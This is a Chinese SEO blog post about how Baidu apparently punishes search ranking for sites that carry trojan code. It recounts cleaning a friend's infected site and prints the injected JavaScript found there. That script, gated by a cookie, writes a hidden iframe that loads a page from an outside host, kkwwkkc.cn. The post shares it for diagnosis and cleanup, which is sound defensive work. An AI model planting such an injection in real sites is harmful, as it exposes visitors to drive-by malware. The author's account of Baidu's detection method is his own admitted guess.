我的一个朋友比较倒霉,最近经常被挂马,每次被挂马之后排名就立马消失,这几次的木马处理都是我帮他发现的,下面就说一下我个人对百度如何判断js木马以及相应的处理方法.
如果说让百度去把js的代码都读懂然后再判断我想这个是不可能的,百度爬虫对js文件不是很喜欢,对于js文件基本上是不读取的,既然少读又读不懂全部,那么它是怎样判断某个网页的js文件就是木马呢?在这几次协助朋友清理木马的过程中,都是又杀毒软件协助,直接用杀毒软件的报警找出相应的挂马文件,然后根据js文件名直接ctrl+f在网页源代码中找出来。由上面的经验我推测,百度不需要读懂js文件,只需要把相应的网页下载到虚拟机,由虚拟机的杀毒软件直接扫描判断得出结论。所以我的推测结论是百度通过下载网页到虚拟机实用虚拟机的杀毒软件对网页js文件进行判断。
下面我们说一下百度对挂马网站的处理,百度和google一样,其目的就是为了保证用户能够搜索到想要的答案,如果说通过百度搜索出来的网页都是挂马的,这当然不是用户和百度所希望的。通过几次的经验我得出的是,某一网站只要被百度判断出被挂马,那么接过只有一个,降权、网页排名消失。网站主应该做的就是找出木马代码然后去掉,去掉之后网站排名一般会在两天之内恢复。
以上是我的经验总结,部分结论纯个人推测,经供参考,希望对各位有用……
转载注明:深邃seo http://www.pcliver.cn
同时欢迎各位订阅我的博客http://feed.pcliver.cn。我的深邃技术也终于突破40的订阅量了,希望用半年的时间可以突破100,(*^__^*) 嘻嘻……
昨晚深邃网友一诺小朋友向我报告说友情链接有一个网站有木马,我一看,晕,那个不是我正在帮他做关
键词优化的QQ个性签名www.91q.org么?一开始以为只是杀软误报,加上我也没有装杀毒软件(一直没中过病毒),所以就没怎么管他?
今天起来用新手机((*^__^*) 嘻嘻……,俺买了黑莓8100)打开百度搜索一下QQ个性签名,晕,排名不知道掉到第几页了。我就郁闷了,自己的SEO优化一直都是很温柔的上的啊,怎么会被降权了?于是就猜想可能真的被挂马了,因为是也算是刚认识的朋友,当然要帮忙处理一下这些琐碎的问题啦。回来之后,马上启用德国杀软小红伞,“滴滴”两声,打开QQ个性签名www.91q.org的时候报警了。于是打开html代码查看,既然没有iframe,这就奇怪了。于是清理缓存再次打开网页,根据小红伞提供的资料找到了报警的文件:info[1].js,打开得到下面的代码:
var az=document.cookie;
var za=az.indexOf(“qqqq”);
if(za!=-1){}else{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”qqqq=web;expires=”+expires.toGMTString();
document.writeln(“<iframe src=http:\/\/kkwwkkc.cn\/10\/zz.htm width=100 height=0><\/iframe>”);window.status=” “;}
我想问题应该出在js代码上,于是在代码搜索js,一个是51la的统计的js,另外一个是div.js,51la的自然可以排除,所以我就打开div.js,然后看到了下面“此地无银三百两”的网址代码(红色字体的),一路跟踪下去,果然发现可疑迹象。
阅读全文…